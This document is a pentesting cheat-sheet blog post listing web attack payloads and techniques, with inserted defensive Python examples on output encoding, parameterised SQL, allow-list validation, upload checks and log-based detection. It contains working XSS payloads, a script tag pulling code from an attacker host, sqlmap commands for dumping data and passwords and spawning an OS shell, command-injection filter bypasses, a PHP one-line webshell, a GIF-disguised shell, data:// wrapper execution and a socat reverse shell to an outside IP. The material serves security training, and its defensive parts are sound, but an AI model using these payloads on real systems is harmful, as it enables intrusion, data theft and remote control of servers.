Pentesting - Common Attacks

XSS

PoC:

```html
<script>alert("hola");</script>
<script>alert(document.cookie);</script>
<img src="" onerror=alert(window.origin)>
```

Basic payloads:

```html
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
<script src="http://<LHOST>/<FILE>"></script>
```
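Added example, not from the original post: why output encoding alone does not protect an unquoted attribute, which is the context the onerror PoC above abuses. Standard library only; render_unquoted, render_quoted and the PAYLOAD value are constructed for this demonstration.

```python
# Added example, not from the original post: output encoding alone does not save an
# unquoted attribute. Standard library only; the payload is a constructed variant of the
# page's onerror probe.
import html
from html.parser import HTMLParser


class AttrCollector(HTMLParser):
    """Record the attribute names of the first <input> tag in the markup."""

    def __init__(self):
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if tag == "input" and self.attrs is None:
            self.attrs = [name for name, _ in attrs]


def render_unquoted(value):
    # Escaped, but the attribute value is unquoted: the first space ends it.
    return "<input value=" + html.escape(value, quote=True) + ">"


def render_quoted(value):
    # Escaped and quoted: the value cannot break out of the attribute.
    return '<input value="' + html.escape(value, quote=True) + '">'


def attribute_names(markup):
    parser = AttrCollector()
    parser.feed(markup)
    return parser.attrs or []


def injected_handlers(markup):
    """Event-handler attributes a browser would see on the rendered tag."""
    return [a for a in attribute_names(markup) if a.startswith("on")]


PAYLOAD = "x onerror=alert(window.origin)"   # constructed, same idea as the <img> PoC above

if __name__ == "__main__":
    for render in (render_unquoted, render_quoted):
        out = render(PAYLOAD)
        print(out, "->", injected_handlers(out) or "no injected handlers")
```

The unquoted form ends up with a second attribute the author never wrote; the quoted form keeps the whole string inside value.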

More information and examples:

Automatic tools for discovering XSS vulnerabilities

https://github.com/s0md3v/XSStrike

Example:

```bash
python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test"
```

  • https://github.com/rajeshmajumdar/BruteXSS

  • https://github.com/epsylon/xsser

SSTI (Server Side Template Injection)

A server-side template injection occurs when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side.

Example:

```text
http://vulnerable-website.com/?name=
```

Detect - Plaintext context:

```text
${7*7}
<%= 7*7 %>
#{7*7}
*{7*7}
```

SQLi (SQL injection)

Automatic tool for SQLi - SQLmap

https://github.com/sqlmapproject/sqlmap

It can test whether a parameter is vulnerable to SQL injection.

Example:

```bash
python sqlmap.py -u "http://<IP>/section.php?id=51" --batch
```

The option ‘-u’ provides the target URL, while the switch ‘--batch’ skips any required user input by automatically choosing the default option.

Some other useful flags:

Basic DB Data Enumeration:

```bash
--banner --current-user --current-db --is-dba
```

To get the database list:

```bash
--dbs
```

To find out what tables exist in a particular database:

```bash
--tables -D <databaseName>
```

To find columns of the table:

```bash
--columns -D <databaseName> -T <tableName>
```

Extracting the data from the table:

```bash
--dump -D <databaseName> -T <tableName>
```

Example GET/POST Requests:

```bash
--data '<parameterName=value&parameterName=value>'
```

Also, if we wanted to specify an alternative HTTP method, other than GET and POST (e.g., PUT), we can utilize the option --method, as follows:

```bash
--data='<parameter=value>' --method <method>
```

Full HTTP Requests: If we need to specify a complex HTTP request with many header values and a long POST body, we can use the -r flag. With this option, SQLMap is given a “request file” containing the whole HTTP request in a single text file. In a common scenario, such an HTTP request is captured in an intercepting proxy (e.g. Burp Suite) and saved to the request file. We can either copy the HTTP request from Burp Suite and write it to a file manually, or right-click the request within Burp and choose Copy to file.

```bash
sqlmap -r <fileRequest.txt>
```

Database schema enumeration:

```bash
--schema
```

Password enumeration and cracking:

```bash
--passwords --batch
```

Searching for data:

```bash
--search -T <string>
```

Checking for DBA privileges:

```bash
--is-dba
```

If the output says ‘current user is DBA: False’, we do not have DBA access. If it says ‘current user is DBA: True’, we may have the privilege to read local files.

Reading a local file:

```bash
--file-read "<fileName>"
```

Spawning an OS shell:

```bash
--os-shell
```

Writing local files (a local file is uploaded to a destination path on the database server):

```bash
--file-write "<localFile>" --file-dest "<remotePath>"
```

If a web shell can be written this way, it gives remote code execution. For example:

```bash
curl http://www.example.com/shell.php?cmd=ls+-la
```

Automatic tool for SQLi - Burpsuite (Intruder)

Manual SQLi Attack Testing

Entry point detection (characters to try in a parameter):

```text
'
"
`
')
")
`)
'))
"))
`))
%27
%22
#
%23
;
%3B
)
```

Comments:

  • MySQL

```sql
#comment
-- comment
/*comment*/
/*! MYSQL Special SQL */
```

  • PostgreSQL

```sql
--comment
/*comment*/
```

  • Oracle and SQLite

```sql
--comment
```

More info and examples about bypass:

Example - Read local file:

```sql
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -
```

Example - Find current user:

```sql
cn' UNION SELECT 1, user(), 3, 4-- -
```

Example - Current database name:

```sql
cn' UNION select 1,database(),2,3-- -
```
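Added example, not from the original post: the UNION payload shape above run against a string-concatenated query, beside the parameterised query that defeats it. It uses an in-memory SQLite database with constructed tables (ports, users); since SQLite has no user(), the payload pulls a column from the constructed users table instead.

```python
# Added example, not from the original post: a UNION injection against concatenated SQL
# and the parameterised query that neutralises it. Constructed SQLite data, standard library.
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE ports(code TEXT, city TEXT, volume INTEGER, country TEXT);
        INSERT INTO ports VALUES ('cn', 'Shanghai', 1, 'China');
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'constructed-secret');
    """)
    return conn


def search_vulnerable(conn, code):
    # User input concatenated straight into the SQL string: the classic bug.
    sql = "SELECT code, city, volume, country FROM ports WHERE code = '" + code + "'"
    return conn.execute(sql).fetchall()


def search_parameterised(conn, code):
    # The driver binds the value; quotes and comment markers in it are just data.
    sql = "SELECT code, city, volume, country FROM ports WHERE code = ?"
    return conn.execute(sql, (code,)).fetchall()


# Same shape as the page's "cn' UNION SELECT 1, user(), 3, 4-- -"; the trailing "-- -"
# comments out the closing quote of the original query.
PAYLOAD = "cn' UNION SELECT 1, password, 3, 4 FROM users-- -"


def demo():
    """Return (rows from the vulnerable query, rows from the parameterised query)."""
    db = make_db()
    return search_vulnerable(db, PAYLOAD), search_parameterised(db, PAYLOAD)


if __name__ == "__main__":
    vulnerable_rows, safe_rows = demo()
    print("vulnerable:", vulnerable_rows)   # the users row rides along with the port row
    print("parameterised:", safe_rows)      # [] : no port has that literal code
```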

RCE (Remote Code Execution)

There are various ways to perform RCE attacks, for example:

Concatenating multiple commands with ‘;’. Example:

```bash
ping -c 1 127.0.0.1; whoami
```

Example with the AND operator (‘&&’):

```bash
ping -c 1 127.0.0.1 && whoami
```

Example with the OR operator (‘||’):

```bash
ping -c 1 127.0.0.1 || whoami
```

Example in a POST request:

```text
<parameter>=||+whoami
```

Sometimes the commands must be joined with ‘+’ (a URL-encoded space), URL-encoded, or combined with other methods.

Using Brace Expansion

There are many other methods we can utilize to bypass space filters. For example, we can use the Bash Brace Expansion feature, which automatically adds spaces between arguments wrapped between braces, as follows:

```bash
{ls,-la}
```

Example RCE: 127.0.0.1%0a{ls,-la}

%0a is the URL-encoded newline, which the shell treats as a command separator.

Bypassing other blacklisted characters

Besides injection operators and space characters, a very commonly blacklisted character is the slash (/) or backslash (\) character, as it is necessary to specify directories in Linux or Windows. We can utilize several techniques to produce any character we want while avoiding the use of blacklisted characters.

  • Linux

There are many techniques we can utilize to have slashes in our payload. One such technique for replacing slashes (or any other character) is Linux environment variables such as ${IFS}. While ${IFS} is directly replaced with a space, there is no such environment variable for slashes or semicolons. However, these characters may appear inside an environment variable, and we can specify a start offset and a length to extract exactly that character.

```bash
echo ${LS_COLORS:10:1}   # ';' with the common default LS_COLORS value (rs=0:di=01;34:...)
```

Example RCE: 127.0.0.1${LS_COLORS:10:1}${IFS}

  • Linux and Windows

Another option is command obfuscation, for example:

```bash
w'h'o'a'mi
w"h"o"a"mi
w\h\o\ami
wh^oami    # Windows (cmd) caret escaping
whoAmi     # Windows only: Linux command names are case-sensitive
```

Example RCE: 127.0.0.1%0aw'h'o'a'mi

  • Reversed commands

Another command obfuscation technique is reversing commands and having a command template that switches them back and executes them in real-time. In this case, we will be writing imaohw instead of whoami to avoid triggering the blacklisted command.

Example:

```bash
echo 'whoami' | rev      # prints imaohw
$(rev<<<'imaohw')        # reverses it back and runs it
```

Example RCE: 127.0.0.1%0a$(rev<<<'imaohw')

  • Encoded commands

Example:

```bash
echo -n 'cat /etc/passwd | grep 33' | base64
bash<<<$(base64 -d<<<IYIQGEhjkwe==)   # the base64 string stands in for the output of the previous command
```

Example RCE: 127.0.0.1%0abash<<<$(base64 -d<<<IYIQGEhjkwe==)

Interesting codes:

Tab, usable instead of a space:

```bash
%09
```

Replaced with whitespace (the shell's internal field separator), so it separates arguments:

```bash
${IFS}
```

Commas are replaced with spaces by brace expansion:

```bash
{ls,-la}
```

Expands to ‘/’ (the first character of PATH):

```bash
${PATH:0:1}
```

Expands to ‘;’ (with the common default LS_COLORS value):

```bash
${LS_COLORS:10:1}
```
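Added example, not from the original post: why a character blacklist fails against the bypasses listed above, and what an allow-list check with a no-shell subprocess call looks like for the ping endpoint this section assumes. Standard library only; blacklist_allows, allowlist_allows and build_ping_command are constructed names, and the BYPASSES list holds the page's own payloads as they would arrive URL-encoded.

```python
# Added example, not from the original post: character blacklist versus IP allow-list for a
# hypothetical ping parameter. Nothing here executes user input.
import ipaddress
import subprocess
from urllib.parse import unquote

BLACKLIST = [";", "&", "|", " ", "/"]   # the kind of filter the bypasses above target


def blacklist_allows(ip_param):
    """Forbid a few characters; everything else passes."""
    value = unquote(ip_param)
    return not any(c in value for c in BLACKLIST)


def allowlist_allows(ip_param):
    """Accept only something that parses as an IP address; everything else is rejected."""
    try:
        ipaddress.ip_address(unquote(ip_param))
        return True
    except ValueError:
        return False


def build_ping_command(ip_param):
    """Return the argv that would run (argument list, no shell), or None if rejected."""
    if not allowlist_allows(ip_param):
        return None
    return ["ping", "-c", "1", unquote(ip_param)]


def run_ping(ip_param):
    argv = build_ping_command(ip_param)
    if argv is None:
        raise ValueError("rejected: not an IP address")
    # shell=False: the IP is one argv element; newlines, ${IFS} and braces are never interpreted.
    return subprocess.run(argv, capture_output=True, text=True, timeout=5).returncode


# Constructed inputs: the page's bypass payloads, URL-encoded as they would arrive.
BYPASSES = ["127.0.0.1%0a{ls,-la}", "127.0.0.1${LS_COLORS:10:1}${IFS}whoami",
            "127.0.0.1%0aw'h'o'a'mi", "127.0.0.1%09{ls,-la}"]

if __name__ == "__main__":
    for p in ["127.0.0.1"] + BYPASSES:
        print(f"{p!r:45} blacklist={blacklist_allows(p)} allowlist={allowlist_allows(p)}")
```

Every bypass in the list passes the blacklist and fails the allow-list, which is the whole point: validate what the value is, not which characters it lacks.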

Example RCE attack with PHP

Upload a simple webshell with the following contents:

```php
<?php system($_GET['cmd']); ?>
```

```bash
curl http://domain.com/uploads/shell.php?cmd=<command>
```

Example - Socat for reverse shell

Code:

```bash
socat TCP4:10.10.14.5:8443 EXEC:/bin/bash
```

Code:

```text
/ping.php?ip=127.0.0.1%0a's'o'c'a't'${IFS}TCP4:10.10.14.15:8443${IFS}EXEC:bash
```

Example - Create a malicious image

Example of a PHP shell inside a GIF file:

```bash
user@domain$ echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif
```
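Added example, not from the original post: server-side upload checks that catch the GIF8<?php trick above as well as the double-extension and null-byte names from the upload section further down. Standard library only; check_upload, name_parts and the SAMPLES dictionary are constructed for this demonstration.

```python
# Added example, not from the original post: magic-byte, extension-segment and embedded
# PHP-tag checks for uploaded images. Constructed samples, standard library only.
import re

ALLOWED = {"gif": b"GIF8", "png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff"}
EXECUTABLE = {"php", "php3", "php5", "phtml", "phar"}
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def name_parts(filename):
    """Lower-cased extension segments, stopping at a null byte (shell.php%00.gif)."""
    name = filename.split("\x00", 1)[0].strip().lower()
    return name.split(".")[1:]


def check_upload(filename, data):
    """Return the reasons to reject the upload; an empty list means accept."""
    reasons = []
    if "\x00" in filename:
        reasons.append("null byte in filename")
    parts = name_parts(filename)
    ext = parts[-1] if parts else ""
    bad = EXECUTABLE.intersection(parts)
    if bad:
        reasons.append(f"executable extension segment {sorted(bad)}")
    if ext not in ALLOWED:
        reasons.append(f"extension '{ext}' not allowed")
    elif not data.startswith(ALLOWED[ext]):
        reasons.append(f"content does not match {ext} signature")
    if PHP_TAG.search(data):
        reasons.append("PHP open tag inside file data")
    return reasons


# Constructed samples; the first is the page's one-liner written to shell.gif.
SAMPLES = {
    "shell.gif": b'GIF8<?php system($_GET["cmd"]); ?>\n',
    "shell.php.gif": b"GIF89a" + b"\x00" * 16,
    "shell.php\x00.gif": b"GIF89a" + b"\x00" * 16,
    "shell.gif.php": b"GIF89a" + b"\x00" * 16,
    "photo.gif": b"GIF89a" + b"\x00" * 16,
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(repr(name), "->", check_upload(name, blob) or "accepted")
```

The magic-byte check alone accepts shell.gif, because the file really does start with GIF8; only the PHP-tag scan rejects it.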

IDOR (Insecure Direct Object References)

An Insecure Direct Object Reference (IDOR) occurs when it is possible to access unauthorized resources by changing a reference the application trusts. For instance, with the URL http://IP/?id=100, modifying the ‘id’ parameter can expose information intended for other users. IDORs are an authorization issue.

Example:

```text
http://192.168.1.45/users?id=1
```

The ID can then be changed manually, or automatically with Burp Suite Intruder, and the responses compared.

The same can be done with ffuf. Example:

```bash
ffuf -w </path/to/values.txt> -u http://192.168.1.45/users?id=FUZZ
```
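Added example, not from the original post: spotting an id enumeration like the ffuf run above in web server access logs, which is the defender's view of the same request pattern. The log lines are constructed (combined log format, hypothetical hosts), and enumeration_suspects is a constructed name.

```python
# Added example, not from the original post: flag clients that walk through many object ids
# on one path, and count how many of those the server actually served (2xx).
import re
from collections import defaultdict

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3})')
ID_RE = re.compile(r"[?&]id=(\d+)")

# Constructed sample log: one client enumerating ids, one client re-reading its own record.
SAMPLE_LOG = """\
10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /users?id=1 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /users?id=2 HTTP/1.1" 200 507
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /users?id=3 HTTP/1.1" 200 498
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /users?id=4 HTTP/1.1" 403 120
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /users?id=5 HTTP/1.1" 200 501
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /users?id=6 HTTP/1.1" 200 503
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /users?id=42 HTTP/1.1" 200 510
10.0.0.9 - - [01/Jan/2024:10:01:00 +0000] "GET /users?id=42 HTTP/1.1" 200 510
"""


def parse(line):
    """Return (ip, path without query, object id, status) or None for lines without an id."""
    m = LOG_RE.match(line)
    if not m:
        return None
    found = ID_RE.search(m["path"])
    if not found:
        return None
    return m["ip"], m["path"].split("?", 1)[0], int(found.group(1)), int(m["status"])


def enumeration_suspects(log_text, threshold=5):
    """(ip, path, distinct ids, ids served with 2xx) for clients at or above the threshold."""
    seen = defaultdict(set)
    served = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        ip, path, obj_id, status = rec
        seen[(ip, path)].add(obj_id)
        if 200 <= status < 300:
            served[(ip, path)].add(obj_id)
    return sorted((ip, path, len(ids), len(served[(ip, path)]))
                  for (ip, path), ids in seen.items() if len(ids) >= threshold)


if __name__ == "__main__":
    for ip, path, total, ok in enumeration_suspects(SAMPLE_LOG):
        print(f"{ip} requested {total} distinct ids on {path}; {ok} were served")
```

A high served count is the part that matters: if the server answered 200 for ids that do not belong to that client, the authorization check is missing, not just the rate limit.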

Python Library Hijacking

A Python script can be used to run system commands, for example:

```python
#!/usr/bin/env python3

import os

# os.system() runs the command through the shell and returns its exit status; the command's
# output goes straight to stdout, so the printed value is the status, not the output.
status = os.system('id')
print(status)
```

If ‘sudo -l’ shows that the user may run ‘python3’ with elevated privileges, the attack can be carried out as follows:

```bash
sudo /usr/bin/python3 <file.py>
```

File Inclusion

More info and examples in:

LFI tools:

  • https://github.com/D35m0nd142/LFISuite

  • https://github.com/OsandaMalith/LFiFreak

  • https://github.com/mzfr/liffy

XML External Entity (XXE) Injection

Automatic tool: https://github.com/enjoiz/XXEinjector

Bypass the client-side file type validations

Fuzzing extensions

Dictionary: https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-extensions.txt

Double extensions

Reverse double extensions

Dictionary double extensions: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Extension%20PHP/extensions.lst

Character Injection

  • %20
  • %0a
  • %00
  • %0d0a
  • /
  • .\
  • .
  • :

MIME-Type

File Signature or Magic Bytes

PHP Wrappers

Example of encoding a PHP shell as base64:

```bash
echo '<?php system($_GET["cmd"]); ?>' | base64
```

Insert it into the vulnerable parameter:

```text
http://<URL>?parameter=data://text/plain;base64,<codeBase64>&cmd=<command>
```

Request it to run the command:

```bash
curl -s 'http://<URL>?parameter=data://text/plain;base64,<codeBase64>&cmd=<command>'
```

More wrappers:

```text
php://filter/read=convert.base64-encode/resource=config
```
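Added example, not from the original post: an allow-list resolver for the include parameter, giving a reason string for the data:// and php://filter wrappers above as well as traversal and null-byte inputs. Standard library only; PAGES, classify and resolve are constructed names, and <codeBase64> is kept as the page's own placeholder.

```python
# Added example, not from the original post: map an include parameter to a file through an
# allow-list so the parameter never becomes part of a path, and say why a value was rejected.
import re

PAGES = {"home": "pages/home.php", "about": "pages/about.php", "contact": "pages/contact.php"}
WRAPPER_RE = re.compile(r"^\s*([a-z][a-z0-9+.-]*)://", re.IGNORECASE)
TRAVERSAL_RE = re.compile(r"(\.\./|\.\.\\|%2e%2e|%00|\x00)", re.IGNORECASE)


def classify(value):
    """Return None if the value is an allowed page name, otherwise why it was rejected."""
    m = WRAPPER_RE.match(value)
    if m:
        return f"stream wrapper '{m.group(1).lower()}://'"
    if TRAVERSAL_RE.search(value):
        return "path traversal or null byte"
    if value not in PAGES:
        return "unknown page"
    return None


def resolve(value):
    """Return the file to include, or raise; only allow-listed names reach the filesystem."""
    reason = classify(value)
    if reason:
        raise ValueError(f"rejected ({reason}): {value!r}")
    return PAGES[value]


# Constructed inputs: the page's wrapper payloads plus a traversal, a null byte and a benign name.
SAMPLES = [
    "about",
    "data://text/plain;base64,<codeBase64>",
    "php://filter/read=convert.base64-encode/resource=config",
    "../../../../etc/passwd",
    "home%00.png",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(repr(s), "->", classify(s) or resolve(s))
```

The reason strings double as log fields: a burst of "stream wrapper" rejections on one parameter is the detection signal for this whole section.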
This post is licensed under CC BY 4.0 by the author.